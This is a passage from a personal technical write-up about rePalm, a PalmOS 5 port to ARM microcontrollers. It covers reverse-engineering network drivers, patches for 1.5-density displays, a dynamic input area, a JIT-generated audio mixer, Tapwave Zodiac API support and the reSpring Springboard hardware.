The self-congratulating did not last long. It turned out that in my notes I marked a few things I had thought inconsequential as "to do: look into this later". Well, it appears that they were not inconsequential. For example: the callback from DHCP to the NetIF driver to notify it of DHCP status was NOT purely informative as I had thought, and in fact a large amount of logic has to exist inside it. That logic, in turn, touches the insides of the DhcpState structure, half of which I had not fully understood since I thought it was opaque to the NetIF driver. Damn, well, back to IDA and more reverse engineering. At some point in time here, to understand what various callbacks between Net.lib and the NetIF driver did, I realized that I need to understand DHCP and ARP a lot better than I did. After sinking some hours into reading the DHCP and ARP RFCs, I dove back into the disassembled code. It all sort of made sense. I'll summarize the rest of the story: it took another three weeks to document every structure and function that ARP and DHCP code uses.

More reverse engineering

There was just one more thing left. As the NetIF driver comes up, it is expected to show UI and call back into Net.lib at various times. Different NetIF drivers I disassembled did this in very different ways, so I was not clear as to what was the proper way to do this. At this point I went to my archive of all the PalmOS ROMs, and wrote a tool to find all the files with the type neti (NetIF drivers have this type), skip all that are PPP, SLIP, or Loopback, and copy the rest to a folder, after deduplicating them. I then disassembled them all, producing diagrams and notes about how each brought itself up and down, where UI was shown or hidden, and when each step was taken. While doing this, I saw some (but not much) logging in some of these drivers, so I was able to rename my own names for various values and structs to more proper ones that writers of those NetIF drivers were kind enough to leak in their log statements. I ended up disassembling: Sony's "CFEtherDriver" from the UX50, Hagiwara's WiFi memorystick driver "HNTMSW_neti", Janam's "WLAN NetIF" from the XP30, Sony's "CFEtherDriver" from the TH55, PalmOne's "PxaWiFi" from Tungsten C, PalmOne's "WiFiLib" from the TX, and PalmOne's "WiFiLib" from their WiFi SD card. Phew, that was a lot! Long story short: the reverse engineered NetIF interface is documented in "netIfaceV5.h" and it is enough that I think a working NetIF driver can be written using it.

"You think?" you might ask, "have you not tested it?". Nope, I am still writing my NetIF driver so stay tuned...

1.5 density support

Density basics

Bad rendered PalmOS

PalmOS since version 4.2 has support for multiple screen densities. That is to say that one could have a device with a screen of the same size, but more pixels in it and still see things rendered at the same size, just with more detail. Sony did have high-res screens before Palm, and HandEra did before both of them, but Palm's solution was the first OS-scale one, so that is the one that PalmOS 5 used. The idea is simple. Each Bitmap/Window/Font/etc has a coordinate system associated with it, and all operations use that to decide how to scale things. 160x160 screens were termed 72ppi (no relation to actual points or inches), and the new 320x320 ones were 144ppi (double density). This made life easy - when the proper density image/font/etc was missing, one could pixel-double the low-res one. The reverse worked to. Pen coordinates also had to be adjusted of course since now the developer could request to work in a particular coordinate system, and the whole system API then had to.

How was this implemented? A few coordinate systems are always in play: native (what the display is), standard (UI layout uses this), and active (what the user set using WinSetCordinateSystem ). So given three systems, there are at any point in time 6 scaling factors to convert from any to any other. PalmOS 5.0 used just one. This was messy and we'll not talk about this further. Lets just say this solution did not stick. PalmOS 5.2 and later use 4 scaling factors, representing bidirectional transforms between active and native, and native and standard. Why not the third pair? It is used uncommonly enough that doing two transformations is OK. Since floating-point math is slow on ARMv5, fixed point numbers are used. Here there is a difference between PalmOS 5.2 and PalmOS 5.4. The former uses 16-bit fixed point numbers in 10.6 format, the latter uses 32-bit numbers in 16.16 format. I'll let you read up about fixed-point numbers on your own time, but the crux of the matter is that the number of fraction bits limits the precision of the number itself and the math you can do with it. Now, for precise powers of two, one does not need that many bits, so while there were only 72ppi an 144ppi screens, 10.6 was good enough, with scale factors always being 0x20 (x0.5), 0x40 (x1.0), and 0x80 (x2.0) . PalmOS 5.4 added support for one-and-a-half density due to the overabundance of cheap 320x240 displays at the time. This new resolution was specified as 108ppi, or precisely 1.5 times the standard resolution. Technically everything in PalmOS 5.2 will work as is, and if you give PalmOS 5.2 such a screen, it will more or less sort of work. To the right you can see what that looks like. Yes, not pretty. But it does not crash, and things sort of work as you'd expect. So why does it look like crap? Well, that scaling thing. Let's see what scale factors we might need now. First of all, PalmOS will not ever scale between 108 and 144ppi for bitmaps or fonts, so those scale factors are not necessary (rePalm will in one special case: to draw 144ppi bitmaps on 108ppi screen, when no 72ppi or 108ppi bitmap is available). So the only new scale factors introduced are between standard and 1.5 densities. From standard to 108ppi the scale factor is 1.5, which is representable as 0x60 in 10.6 fixed point format. So far so good, that is exact and math will work perfectly every time. But from 108ppi to 72ppi the scale factor is 2/3, which is NOT representable exactly in binary (no matter how many bits of precision you have). The simple rule with fixed-point math is that when your numbers are not representable exactly, your rounding errors will accumulate to more than one once the values you operate on are greater than one over your LSB. So for 10.6, the LSB is 1/64, so once we start working with numbers over 64, rounding will have errors of over one. This is a problem, since PalmOS routinely works with numbers over 64 when doing UI. Hell, the screen's standard-density width is 160. Oops... These accumulated rounding errors are what you see in that screenshot. Off by one here, off by one there, they add up to that mess. 108ppi density became officially supported in PalmOS 5.4. So what did they do to make it work? Switch to 16.16 format. The LSB there is 1/65536, so math on numbers up to 65536 will round correctly. This is good enough since all of PalmOS UI uses 16-bit numbers for coordinates.

How does it all fall apart?

So why am I telling you all this? Well, PalmOS 5.4 has a few other things in it that make it undesirable for rePalm (rePalm can run PalmOS 5.4, but I am not interested in supporting it) due to NVFS, which is mandatory in 5.4. I wanted PalmOS 5.2 to work, but I also wanted 1.5 density support, since 320x240 screens still are quite cheap, and in fact my STM32F427 dev board sports one. We cannot just take Boot.prc from PalmOS 5.4 and move it, since that also brings NVFS. So what to do? I decided to take an inventory of every part of the OS that uses these scaling values. They are hidden inside the "Window" structure, so mostly this was inside Boot . But there are other ways to fuck up. For example in a few places in UI , sequences like this can be seen: BmpGetDensity( WinGetBitmap( WinGetDisplayWindow())) . This is clearly a recipe for trouble because code that was never written to see anything other than a 72 or a 144 as a reply is about to see a 108. But, some of that is harmless, if math is not being done with it. It can quite harmful, however, if it is used in math. I disassembled the Boot from a PalmOS 5.4 device (Treo 680) and one from a PalmOS 5.2 device (Tungsten T3). For each place I found in the T3 ROM that looked weird, I checked what the PalmOS 5.4 Boot did. That provided most of the places of worry. I then searched the PalmOS 5.4 ROM for any references to 0x6C as that is 108 in hex, and a very unlikely constant to occur in code naturally for any other reason (luckily). I also looked at every single division to see if coordinate scaling was involved. This produced a complete list of all the places in the ROM that needed help. There were over 150...

How do we fix it?

Patching this many places is doable, but what if tomorrow I decide to use the Boot from another device? No, this was not a good solution. I opted instead to write an OEM extension (a module that the OS will load at boot no matter what) and fix this. But how? If the ROM is read only, and we do not have an MMU to map a page over the areas we want to fix, how to fix them? Well, every such place is logically in a function. And every function is sometimes called. It may be called by a timer, a notification, be a thread, or be a part of what the user does. Luckily PalmOS only expect UI work form the UI thread, so ALL all them were only called from use-facing functions. Sadly some were buried quite deep. I got started writing replacement functions, basing them on what the Boot from PalmOS 5.4 did. For most functions I wrote full patches (that is my patch entirely replaces the original function in the dispatch table, never calling back to the original). I wrote 73 of those: FntBaseLine , FntCharHeight , FntLineHeight , FntAverageCharWidth , FntDescenderHeight , FntCharWidth , FntWCharWidth , FntCharsWidth , FntWidthToOffset , FntCharsInWidth , FntLineWidth , FntWordWrap , FrmSetTitle , FrmCopyTitle , CtlEraseControl , CtlSetValue , CtlSetGraphics , CtlSetSliderValues , CtlHandleEvent , WinDrawRectangleFrame , WinEraseRectangleFrame , WinInvertRectangleFrame , WinPaintRectangleFrame , WinPaintRoundedRectangleFrame , WinDrawGrayRectangleFrame , WinDrawWindowFrame , WinDrawChar , WinPaintChar , WinDrawChars , WinEraseChars , WinPaintChars , WinInvertChars , WinDrawInvertedChars , WinDrawGrayLine , WinEraseLine , WinDrawLine , WinPaintLine , WinInvertLine , WinFillLine , WinPaintLines , WinGetPixel , WinGetPixelRGB , WinPaintRectangle , WinDrawRectangle , WinEraseRectangle , WinInvertRectangle , WinFillRectangle , WinPaintPixels , WinDisplayToWindowPt , WinWindowToDisplayPt , WinScaleCoord , WinUnscaleCoord , WinScalePoint , WinUnscalePoint , WinScaleRectangle , WinUnscaleRectangle , WinGetWindowFrameRect , WinGetDrawWindowBounds , WinGetBounds , WinSetBounds , WinGetDisplayExtent , WinGetWindowExtent , WinGetClip , WinSetClip , WinClipRectangle , WinDrawBitmap , WinPaintBitmap , WinCopyRectangle , WinPaintTiledBitmap , WinCreateOffscreenWindow , WinSaveBits , WinRestoreBits , WinInitializeWindow . A few things were a bit too messy to replace entirely. An example of that was PrvDrawControl a function that makes up the guts of CtlDrawControl , but is also used in a lot of places like event handling for controls. What to do? Well, I can replace all callers of it: FrmHandleEvent and CtlDrawControl , but that does not help since PrvDrawControl itself has issues and is HUGE and complex. After tracing it very carefully, I realized that it only really cares about density in one special case, when drawing a frame of type 0x4004 , in which case it instead sets the coordinate system to native, and draws a frame manually, and then resets the coordinate system. So, what I did is set a special global before calling it if the frame type requested is that special one, and the frame drawing function, the one I had already rewritten ( WinDrawRectangleFrame ) then sees that flag and instead does this special one thing. The same had to be done for erasing frame type 0x4004 , and the same method was employed. The results? It worked!

Well rendered PalmOS

There was one more complex case left - drawing a window title. It was buried deep inside FrmDrawForm since a title is technically a type of a frame object. To intercept this without rewriting the entire function, before it runs, I converted a title object to a special king of a list object, and saved the original object in my globals. Why a list? FrmDrawForm will call LstDrawList on a list object, and will not peek inside. I then intercept LstDrawList , check for our magic pointer, if so, draw the title, else let the original LstDrawList function run. On the way out of FrmDrawForm , this is all undone. For form title setting functions, I just replaced them since they redraw the title manually, and I already had written a title drawing function. There was one small thing left: the little (i) icon on forms that have help associated with them. It looked bad when tapped. My title drawing function drew it perfectly, but the tap responce was handled by FrmHandleEvent - another behemoth I did not want to replace. I looked at it, and saw that the handling of the user taps on the help (i) icon was pretty early on. So, I duplicated that logic (and some that preceded it) in my patch for FrmHandleEvent and did not let the original function get that event. It worked perfectly! So thus we have four more partial patches: LstDrawList , FrmDrawForm , FrmHandleEvent , and CtlDrawControl .

And now, for some polish

Still one thing was left to do: proper support for 1.5 density feature set as defined by the SDK. So: I modified the DAL to allow me to patch functions that do not exist in the current OS version at all, since some new ones were added after 5.2 to make this feature set work: WinGetScalingMode and WinSetScalingMode . Then I modified PACE 's 68k dispatch handler for sysTrapHighDensityDispatch to handle the new 68K trap selectors HDSelectorWinSetScalingMode and HDSelectorWinGetScalingMode , letting the rest of the old ones be handled by PACE as they were. I also got a hold of 108ppi fonts, and wrote some code to replace the system fonts with them, and I got a hold of 108ppi system images (like the alert icons) and made my extension put them in the right places.

The result? The system looks pretty good! There are still things left to patch, technically, and "main.c" in the "Fix1.5DD" folder has a comment listing them, but they are all minor and the system looks great as is. The "Fix1.5DD" extension is part of the source code that I am releasing with rePalm, and you can see the comparison "after" screenshot just above to the right. It is about 4000 lines of code, in 77 patches and a bit of glue and install logic.

Dynamic Input Area/Pen Input Manager Services support

DIA/PINS basics

PalmOS initially supported square screens. A few OEMS (Handera, Sony) did produce non-square screens, but this was not standard. Sony made quite a headway with their 320x480 Sony Clie devices. But their API was sony-only and was not adopted by others. When PalmOS 5.2 added support for non-square screens, Palm made an API that they called PINS (or alternatively DIA or AIA). It was not as good as Sony's API but it was official, and thus everyone migrated to it. Later sony devices were forced to support it too. Why was it worse? Sony's API was simple: collapse dynamic input area, or bring it back. Enable or disable the button to do so. Easy. Palm's API tries to be smart, with things like per-form policies, and a whole lot of mess. It also has the simple things: put area down or up, or enable or disable the button. But all those settings get randomly mutated/erased anytime a new form comes onscreen, which makes it a huge pain! Well, in any case. That is the public API. How does it all work? In PalmOS 5.4, this is all part of the OS proper, and integrated into Boot .

How it works pre-garnet

But, as I had said, I was tergetting PalmOS 5.2. There, it was not a part of the OS, it was an extension. The DAL presents to the system a raw screen of whatever the actual resolution is (commonly 320x480) and the extension hides the bottom area from the apps and draws the dynamic input area on it. This requires some interception of some OS calls, like FrmDrawForm (to apply the new policy), FrmSetActiveForm (to apply policy to re-activated already drawn forms), SysHandleEvent (to handle events in the dynamic input area), and UIReset (to reset to defaults the settings on app switching). There are also some things we want to be notified about, like screen color depth change. When that happens, we may need to redraw the input area. That is the gist of it. There are a lot of small but significant specifics though.

The intricacies of writing a DIA implementation

Before embarking on writing my own DIA implementation, I tried all the existing ones to see if they would support resolution other than 320x480. I do not want to write pointles code, afterall. None of them worked well. Even such simple things as 160x240 (direct 2x downscaling) were broken. Screens with different aspect ratios like the common 240x320 and 160x220 were even more broken. Why? I guess nobody ever writes generic code. It is simpler to just hack things up for "now" with no plan for "later". Well, I decided to write a DIA implementation that could support almost any resolution.

When the DIA is collapsed, a status bar is shown. It shows small icons like the home button and menu button, as well as the button to unhide the input area. I tried to make everything as generic as possible. For every screen resolution possible, one can make a skin. A skin is a set of graphics depicting the DIA, as well as some integers describing the areas on it, and how they act (what key codes they send, what they do). The specifics are described in the code and comments and samples (3 skins designed to look similar to sony's UIs). They also define a "notification tray" area. Any app can add icons there. Even normal 68k apps can! I am including an example of this too. The clock you see in the status bar is actually a 68k app caled "NotifGeneral" and its source is provided as part of rePalm's source code! My sample DIA skins currently support 320x480 in double-density, 240x320 in 1.5 density, and 160x220 single density. The cool part? The same codebase supports all of these resolutions despite them having different aspect ratios. NotifGeneral also runs on all of those unmodified. Cool, huh? The source code for the DIA implementation is also published with rePalm, of course!

Audio support

PalmOS Audio basics

Since PalmOS 1.0, there has been support for simple sound via a piezo speaker. That means simple beeps. The official API allows one to: play a MIDI file (one channel, square waves only), play a tone of a given volume and amplitude (in background or in foreground), and stop the tone. In PalmOS 5.0, the low level API that backs this simple sound API is almost the same as the high-level official API. HALSoundPlay is used to start a tone for a given duration. The tone runs in the background, the func itself returns directly and immediately. If another tone had previously been started, it is replaced with the new one. A negative duration value means that the tone will never auto-stop. HALSoundOff stops a currently-playing tone, if there is one. HALPlaySmf plays a MIDI tune. This one is actually optional. If the DAL returns an error, Boot will interpret the MIDI file itself, and make a series of calls to HALSoundPlay . This means that unless you have special hardware that can play MIDI better than simple one-channel square waves, it makes no sense to implement HALPlaySmf in your DAL .

PalmOS sampled sudio support

Around the time PalmOS 5.0 came out, the sampled sound API made an appearance. Technically it does not require PalmOS 5.0, but I am not aware of any Palm OS 4 device that implement this API. There were previous vendor-specific audio APIs in older PalmOS releases, but they were nonstandard and generally depended on custom hardware accelerator chips, since 68k processor is not really fast enough to decode any complex audio formats. The sampled sound API is obviously more complex than the simple sound API, but it is easily explained with the concept of streams. One can create an input or output stream, set volume and pan for it, and get a callback when data is available (input) or needed (output). For output streams, the system is expected to mix them together. That means that more than one audio stream may play at the same time and they should all be heard. Simple sound API should also work concurrently. PalmOS never really required support for more than one input stream, so at least that is nice.

A stream (in or out) has a few immutable properties. The three most important ones are the sample rate, the channel number, and the sample format. The sample rate is basically how many samples per second there are. CD audio uses 44,100 per second, most DVDs use 48,000 per second, and cheap voice recorders use 8,000 (approximately telephone quality). PalmOS support only two channel widths: 1 and 2. These are commonly known as "mono", and "stereo". Sample type is a representation of how each sample is represented in the data stream. PalmOS API documents the following sample types: signed and unsigned 8-bit values, signed 16-bit values of any endianness, signed 32-bit values of any endianness, single-precision floating point values of any endianness. As far as I can tell, the only formats ever supported by actual devices were the 8 and 16-bit ones.

Why audio is hard & how PalmOS makes it easy

Mixing audio is hard. Doing it in good quality is harder, and doing it fast is harder yet. Why? The audio hardware can only output one stream, so you need to mix multiple streams into one. Mixing may involve format conversion, for example if hardware needs signed 16-bit little-endian samples and one of the streams is in float format. Mixing almost certainly involves scaling since each stream has a volume and may have a pan applied. And, hardest of all, mixing may involve resampling. If, for example, the hardware runs at 48,000 samples per second, and a client requested to play a stream with 44,100 samples per second, more samples are needed than are provided - one needs to generate more samples. This is all pretty simple to do, if you have large buffers to work with, but that is also a bad idea, since that adds a lot of latency - the larger your buffer, the more time passes between the app providing audio data and the audio coming out the speaker. In the audio world, you are forced to work with relatively small buffers. Users will also notice if you are late delivering audio samples to the hardware (they'll hear it). This means that you are always on a very tight schedule when dealing with audio.

What do existing PalmOS DAL s do to address all this difficulty? Mostly, they shamelessly cut corners. All existing DAL s have a very bad resampler - it simply duplicates samples as needed to upsample (convert audio to a higher sampling rates), and drops samples as needed to downsample (convert audio to a lower sampling rates). Why is this bad? Well, when resampling between sample rates that are close to each other in this manner, this method will introduce noticeable artifacts. What about format conversions? Well, only supporting four formats is pretty easy - the mixing code was duplicated four times in the DAL , once for each time.

How rePalm does audio mixing

I wanted rePalm to produce good audio quality, and I wanted to support all the formats that PalmOS API claimed were supported. Actually, I ended up supporting even more formats: signed and unsigned 8, 16, and 32-bit integer, as well as single-precision floating-point samples in any endianness. For sample rates, rePalm's mixer supports: 8,000, 11,025, 16,000, 22,050, 24,000, 32,000, 44,100, and 48,000 samples per second. The format the output hardware uses is decided by the hardware driver at runtime in rePalm. Mono and stereo hardware is supported, any sample rate is supported, and any sample format is supported for native hardware output. If you now consider the matrix of all the possible stream input and output formats, sample rates, and channel numbers, you'll realize that it is a very large matrix. Clearly the PalmOS approach of duplicating the code 4 times will not work, since we'd have to duplicate it hundreds or thousands of times. The alternative approach of using generic code that switches based on the types is too slow (the switching logic simply wastes too many cycles per sample). No simple solutions here. But before we even get to resampling and mixing, we need to work out how to deal with buffering.

The initial approach involved each channel having a single circular buffer that the client would write and the mixer would read. This turned out to be too difficult to manage in assembly. Why in assembly? We'll get to that soon. The final approach I settled on was actually simpler to manage. Each stream has a few buffers (buffer depth is currently defined to be four), and after any buffer is 100% filled, it is sent to the mixer. If there are no free buffers, the client blocks (as PalmOS expects). If the mixer has no buffers for a stream, the stream does not play, as PalmOS API specifies. This setup is easy to manage from both sides, since the mixer now never has to deal with partially-filled buffers or sorting out the circular-buffer wraparound criteria. A semaphore is used to block the client conveniently when there are no buffers to fill. "But," you might ask, "what if the client does not give a full buffer's worth of data?" Well, we do not care. Eventually if the client wants the audio to play, they'll have to give us more samples. And in any case, remember how above we discussed that we have to use small buffers? Any useful audio will be big enough to fill at least a few buffers.

One mustn't forget that supporting sampled sound API does not absolve you from having to support simple sound functions. rePalm creates a sound stream for simple sound support, and uses it to play the required tones. They are generated from an interpolated sine wave at request time. To support doing this without any pesky callbacks, the mixer supports special "looped" channels. This means that once the data buffer is filled, it is played repeatedly until stopped. Since at least one complete wave must fit into the buffer, rePalm refuses to play any tones under 20Hz. This is acceptable to me.

How do assembly and audio mix?

The problem of resampling, mixing, and format conversion loomed large over me. The naive approach of taking a sample from each stream, mixing it into the output stream, and then doing the same for the next stream is too slow, due to the constant "switch"ing required based on sample types and sample rates. Resampling is also complex if done in good (or at least passable) quality. So what does rePalm's DAL do? For resampling, a large number of tables are used. For upsampling, a table tells us how to linearly interpolate between input samples to produce output samples. One such carefully-tuned table exists for each pair of frequencies. For downsampling, a table tells us how many samples to average and at what weight. One such table exists for each pair of frequencies. Both of these approaches are strictly better than what PalmOS does. But, if mixing was already hard, now we just made it harder. Let's try to split it into chewable chunks. First, we need an intermediate format - a format we can work with efficiently and quickly, without serious data loss. I picked signed 32-bit fixed point with 8 integer bits and 24 fraction bits. Since no PalmOS device ever produced audio at more than 24-bit resolution, this is acceptable. The flow is conceptually simple: first zero-fill an intermediate buffer. Then, for each stream for which we have buffers of data, mix said buffer(s) into the intermediate buffer, with resampling as needed. Then clip the intermediate buffer's samples, since mixing two loud streams can produce values over the maximum allowed. And, finaly, convert the intermediate buffer into the format hardware supports, and hand it off to the hardware. rePalm does not bother with a stereo intermediate buffer if the audio hardware is mono only. The intermediate buffer is only in stereo if the hardware is! How do we get this much flexibility? Because of how we mix things into it.

The only hard part from above is that "mix buffers into the intermediate buffer with resampling" step. In fact, not only do we need to resample, but we also need to apply volume, pan, and possibly convert from mono to stereo or from stereo to mono. The most optimal approach is to write a custom well-tuned mix function for every possible combination of inputs and outputs. The number of combinations is dizzying. Input has 8 possible rates, 2 possible channel configs, and 12 possible sample types. Output has 8 possible rates and 2 possible channel configs. This means that there is a total of just over 3,000 combinations (8 * 2 * 12 * 8 * 2). I was not going to write 3072 functions by hand. In fact, even auto-generating them at build time (if I were to somehow do that) would bloat rePalm's DAL 's code size to megabytes. No, another approach was needed.

I decided that I could reuse some things I learned while I was writing the JIT, and also reuse some of its code. That's right! When you create a stream, a custom mix function is created just for that stream's configuration, and for your hardware's output configuration. This custom assembly code uses all the registers optimally and, in fact, it manages to use no stack at all! The benefit is clear! The mixing code is always optimal since it is custom for your configuration. For example, if the hardware only supports mono output, the mixing code will downmix before upsampling (to do it to fewer samples), but will only downmix after downsampling (once again, so less math is needed). Since there are three major cases: upsampling, downsampling, and no-resampling, there are three paths through the codegen to produce mix functions. Each mix function matches a very simple prototype: int32_t* (*MixInF)(int32_t* dst, const void** srcP, uint32_t maxOutSamples, void* resampleStateP, uint32_t volumeL, uint32_t volumeR, uint32_t numInSamples) . It returns the pointer to the first intermediate buffer sample NOT written. srcP is updated to point to the first input audio sample not consumed, maxOutSamples limits how many audio samples may be produced, numInSamples limits how many audio samples may be consumed. Mix functions return when either limit is reached. Resampling logic may have long-lived state, so that is stored in a per-stream data structure (5 words), and passed in as resampleStateP . The actual resample table pointer is encoded in the function itself (for speed), since it will never change. Why? Because the stream's sample rate is constant, and the hardware will not magically grow ability to play at another sample rate at a later time. The stream's volume and pan, however, may be changed anytime, so they are not hardcoded into the function body. They are provided as parameters at mixing time. I actually considered hardcoding them in, and re-generating the mix function anytime the volume or pan changed, but the gain would have been too small to matter, so I decided against it. Instead we simply pre-calculate "left volume" and "right volume" from the user settings of volume" and "pan" and pass them to the mix function.

Having a mix function that nice makes the rest of the mixer easy. Simply: call the mix function for each non-paused stream as long as there are buffers to consume and the output buffer is not full. If we fully consume a buffer, release it to the user. If not, just remember how many samples in there we haven't yet used for later. That is all! So does all this over-complex machinery work? Yes it does! The audio mixer is about 1,500 lines, BUT it can resample and mix streams realtime at under 3 million cycles per stream per second, which is much better than PalmOS did, and with better quality to boot! The code is in "audio.c".

rePalm's audio hw driver architecture

rePalm's audio hardware layer is very simple. For simple sound support, one just provides the funcs for that and the sound layer clals them directly. For sampled audio, the audio init function tells the audio mixer the native channel number and sample rate. What about native sample format? The code provides an inline function to convert a sample from the mixer's intermediate format (8.24 signed integer) to whatever format the hardware needs. Thus, the hardware's native sample format is defined by this inline function. At init time the hw layer provides to the mixer all this info, as well as the size of the hardware audio buffer. This buffer is needed since interrupts have latency and we need the audio hw to always have some audio to play.

On the STM32F429 board, audio output is on pin A5. The audio is generated using a PWM channel, running at 48,000 samples per second, in mono mode. Since the PWM clock runs at 192MHz, if we want to output 48,000 samples per second, the PWM unit will only be able to count to 4000. Yes, indeed, for this board, since it lacks any real audio output hardware, we're stuck with just about 12-bit precision. This is good enough for testing purposes and actually doesn't sound all that bad. The single-ended output directly from the pin of the microcontroller cannot provide much power, but with a small speaker, the sound is clear and sounds great! I will upload an image with audio support soon.

On reSpring, the CPU clock (and thus PWM clock) is at 196.6MHz. Why this weird frequency? Because it is precisely 48,000 x 4096. This allows us to not need to scale audio in a complex fashion, like we do on the STM32F429 board. Just saturating it to 12 bits will work. Also, on reSpring, two pins are used to output audio, in opposite polarity, this gives us twice the voltage swing, producing louder sounds.

Microphone

I did not implement a mixer/resampler for the microphone - PalmOS never supported more than one user of a microphone at a time, so why bother? - no apps will do so. Instead, whichever sampling rate was requested, I pass that to the hardware driver and have it actually run at that sampling rate. As for sample type, same as for audio out, a custom function is generated to convert the sample format from the input (16 bit little-endian mono), to whatever the requested format was. The generated code is pretty tight and works well!

Zodiac support

Tapwave Zodiac primer

Tapwave Zodiac was a rather unusual PalmOS device released in 2003. It was designed for gaming and had some special hardware just for that: landscape screen, an analog stick, a Yamaha Midi chip, and an ATI Imageon W4200 graphics accelerator with dedicated graphics RAM. There was a number of Tapwave-exclusive titles released that used the new hardware well, including some fancy 3D games. Of course this new hardware needed OS support. Tapwave introduced a number of new APIs, and, luckily, documented them quite well. The new API was quite well designed and easy to follow. The documentation was almost perfect. Kudos, Tapwave! Of course, I wanted to support Tapwave games in rePalm.

The reverse engineering

Tapwave's custom API were all exposed via a giant table of function pointers given to all Tapwave-targetting apps, after they pass the signature checks (Tapwave required approvals and app signing). But, of course, somewhere they had to go to some library or hardware. Digging in, it became clear that most of them go to Tapwave Application Layer ( TAL ). This module is special, in that on the Zodiac, like the DAL , Boot , and UI , the TAL can be accessed directly off of R9 via LDR R12, [R9, #-16]; LDR PC, [R12, #4 * tal_func_no] . But, after spending a lot of time in the TAL , I realized that it was just a wrapper. All the other libraries were too: Tapwave Midi Library and Tapwave Multiplayer Library . All the special sauce was in the DAL. And, boy, was there a lot of special sauce. Normal PalmOS DALs have about 230 entrypoints. Tapwave's has 373!

A lot of tracing through the TAL , and a lot of trawling through the CPU docs got me the names and params to most of the extra exported DAL funcs. I was able to deduce what all but 14 functions do! And as for those 14: I could find no uses of any of them anywhere in the device's software! The actual implementations underneath matter a bit less since I am just reimplementing them. My biggest worries were, of course, the graphics acceleration APIs. Turned out that that part was the easiest!

The "GPU"

Zodiac's graphics accelerator was pretty fancy for a handheld device at the time, but it is also quite basic. It has 8MB of memory built in, and accelerates only 2D operations. Basically, it can: copy rectangles of image data, blend rectangles between layers with constant or parametric alpha blending, do basic bilinear resizing, and draw lines, rectangles, and points. It operates only on 16-bit RGB565LE layers. This was actually quite easy to implement. Of course doing this in software would not be fast, but for the purposes of my proof of concept, it was good enough. A few days of work, and ... it works! A few games ran.

Next step is still in-progress: using the DMA2D unit in the STM32 to accelerate most of the things the ATI chip can do. Except for image resizing, it can do them all in one pass or two! For extra credit, it can also operate in the background like the ATI chip did to the CPU in the Zodiac. But that is for later...

Other Tapwave APIs

Input subsystem in the Zodiac was quite special and required some work. Instead of the usual PalmOS methods of reading keys, touch, etc, they introduced a new "input queue" mechanism that allowed all of these events to be delivered all into one place. I had to reimplement this from nothing but the documented high level API and disassembly. It worked: rePalm now has a working implementation of TwInput and can be used as reference for anyone who also for some reason wants to implement it.

TwMidi was mostly reverse engineered in a week. But I did not write a midi sequencer. I could and shall, but not yet. The API is known and that is as far as I needed to go to return proper error codes to allow the rest of the system to go on.

Real hardware: reSpring

The ultimate Springboard accessory

Back when Handspring first released the Visor, its Springboard Expansion Slot was one of the most revolutionary features. It allowed a few very cool expansion devices, like cellular phones , GPS receivers , barcode readers , expansion card readers , and cameras . Springboard slot is cool because it is a literal direct connection to the CPU's data and address bus. This provides a lot of expansion opportunities. I decided that the first application of rePalm should be a Springboard accessory that will, when pluged in, upgrade a Visor to PalmOS 5. The idea is that reSpring will run rePalm on its CPU, and the Visor will act as the screen, touch, and buttons. I collaborated with George Rudolf Mezzomo on reSpring, with me setting the specs, him doing the schematics and layout, and me doing the software and drivers.

Interfacing with the Visor

To the Visor, the sprinboard module looks like two memory areas (two chip select lines), each a few megabytes large at most. The first must have a valid ROM image for the Visor to find, structured like a PalmOS ROM memory, with a single heap. Usually that heap contains a single application - the driver for this module. The second chip select is usually used to interface to whatever hardware the Springboard unit has. For reSpring I decided to do things differently. There were a few reasons. The main reason was that a NOR flash to store the ROM would take up board space, but also because I really did not want to manage so many different flashable components on the board. There was a third reason too, but we'll need to get back to that in a bit.

The Visor expects to interface with the Springboard by doing memory accesses to it (reads and writes) and the module is expected to basically behave like a synchronous memory device. That means that there is no "I am ready to reply" line, instead you have a fixed number of cycles to reply to any request. When a module is inserted, the Visor configured that number to be six, but it can then be lowered by the module's driver app. Trying to reply to requests coming in with a fixed (and very short) deadline would be a huge CPU load for our ARM CPU. I decided that the easiest way to accomplish this is to actually put a RAM there, and let the Visor access that. But, then, how will we access it, if the Visor can do so anytime? Well, there are special types of RAM that allow this.

Yes, the elusive (and expensive) dual-ported RAM. I decided that reSpring would use a small amount of dual-ported RAM as a malbox between the Visor and rePalm's CPU. This way the Visor could access it anytime, and so could rePalm. The Springboard slot also has two interrupt request lines, one to the Visor, one to the module. These can be used to signal when a message is in the mailbox. There are two problems. The first is that dual-ported RAMs are usually large, mostly due to the large number of pins needed. Since the Visor needs a 16-bit-wide memory in the Springboard slot, our hypotherical dual-ported RAM would need to be 16-bit wide. And then we need address lines, control lines, byte lane select lines, and chip select lines. If we were to use a 4KB memory, for example, we'd need 11 address lines, 16 data lines, 2 byte lane select lines, one chip select line, one output enable line, and one write enable line, PER PORT! Add in at least two power pins, and our hypothetical chip is a 66-pin monstrosity. Since 66-pin packages do not exist, we're all in for a 100-pin part. And 4KB is not even much. Ideally we'd like to fit our entire framebuffer in there to avoid complex piecewise transfers. Sadly, as the great philosopher Jagger once said, "You can't always get what you want." Dual-ported RAMs are very expensive. There are only two companies making them, and they charge a lot . I settled on the 4KB part purely based on cost. Even at this measly 4KB size, this one RAM is by far the most expensive component on the board at $25. Given that the costs of putting in a 64KB part (my preferred size) were beyond my imagination (and beyond my wallet's abilities), I decided to invent a complex messaging protocol and make it work over a 4KB RAM used as a bidirectional mailbox.

But, let us get back to our need for a ROM to hold our driver program. Nowhere in the Sprinboard spec is there actually a requirement for a ROM, just a memory. So what does that mean? We can avoid that extra chip by having the reSpring CPU contain the ROM image inside it, and quickly write it into the dual-ported RAM on powerup. Since the Visor gives the module up to three seconds to produce a valid card header, we have plenty of time to boot up and write the ROM to our RAM. One chip fewer to buy and place on the board is wonderful!

Version 1

I admit: there was a bit of feature creep, but the final hardware design for version 1 ended up being: 8MB of RAM, 128MB of NAND flash, a 192MHz CPU with 2MB of flash for the OS, a microSD card slot, a speaker for audio out, and an amplifier to use the in-Visor microphone for audio in. Audio out will be done the same way as on the STM32F429 board, audio in will be done via the real ADC. The main RAM is on a 32-bit wide bus running at 96MHz (384MB/s bandwidth). The NAND flash is on a QSPI bus at 96MHz (48MB/s bandwidth). The OS will be stored in the internal flash of the STM32F469 CPU. The onboard NAND is just an exploration I would like to do. It will either be an internal SD card, or maybe storage for something like NVFS(but not as unstable), when I've had time to write it.

So, when is this happening? Five version 1 boards were delivered to me in late November 2019!

Bringup of v1

